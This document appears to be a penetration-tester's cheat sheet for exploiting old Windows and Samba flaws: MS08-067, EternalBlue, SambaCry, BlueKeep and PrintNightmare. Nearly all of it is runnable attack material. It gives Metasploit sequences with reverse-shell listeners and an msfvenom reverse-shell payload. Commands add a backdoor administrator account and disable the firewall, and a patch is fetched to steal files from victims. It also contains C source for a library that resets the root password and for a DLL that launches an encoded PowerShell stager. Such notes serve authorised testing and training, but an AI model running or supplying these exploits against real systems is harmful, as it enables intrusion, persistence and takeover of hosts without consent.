net_api
CVE-2008-4250, MS08-067
Check:
Copy $ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
Exploit:
Copy msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalBlue
CVE-2017-0144, MS17-010
MSF
Check:
Copy $ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
Exploit with:
Copy msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalRomance / EternalSynergy / EternalChampion
Exploit with ms17_010_psexec
:
Copy msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
Exploit with ms17_010_command
:
Copy msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run
Manually
Send MSF payload and execute it with send_and_execute.py
:
Copy $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
Or just execute commands on host via zzz_exploit.py
(at least one named pipe must be accessible on target):
Copy $ python zzz_exploit.py 192.168.1.11
Copy # ...
def smb_pwn ( conn , arch ):
service_exec (conn, r 'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable' )
# ...
A patch for grabbing remote files from Victim:
Copy $ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch
FuzzBunch (Wine)
SambaCry
CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)
MSF
Copy msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
Manually
Compile .so
SUID shared library:
Copy // gcc -shared -fPIC -o pwn.so pwn.c
#include <stdio.h>
#include <stdlib.h>
static void pwn () __attribute__ ((constructor));
void pwn () {
setresuid( 0 , 0 , 0 ) ;
system( "echo 'root:Passw0rd!'|chpasswd" ) ;
}
Get real share path on the target's filesystem:
Copy $ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path: /home/snovvcrash/sharename
Upload pwn.so
to target and then run the exploit:
Copy $ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
BlueKeep
CVE-2019-0708
Check:
Copy msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
Exploit:
Copy msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
PrintNightmare
CVE-2021-16751, CVE-2021-34527
Check
CrackMapExec
Copy $ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
ItWasAllADream
Copy $ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'
Exploit
C/C++
RCE (fork of the original repo):
LPE:
Python
RCE:
Usage
Generate an evil DLL: a С2 stager / add user to a privileged group (1 , 2 , 3 , etc.) / invoke a custom command (see example below).
Copy $ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
Copy // x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
// Default function that is executed when the DLL is loaded
void Entry () {
system( "powershell -enc <BASE64_PWSH_CODE>" ) ;
}
BOOL APIENTRY DllMain (HMODULE hModule , DWORD ul_reason_for_call , LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH :
CreateThread ( 0 , 0 , (LPTHREAD_START_ROUTINE)Entry , 0 , 0 , 0 );
break ;
case DLL_THREAD_ATTACH :
case DLL_THREAD_DETACH :
case DLL_PROCESS_DETACH :
break ;
}
return TRUE ;
}
C#
RCE + LPE:
PowerShell
LPE:
Reproducibility
Flowchart by @wdormann :
Mitigation
Last updated 6 months ago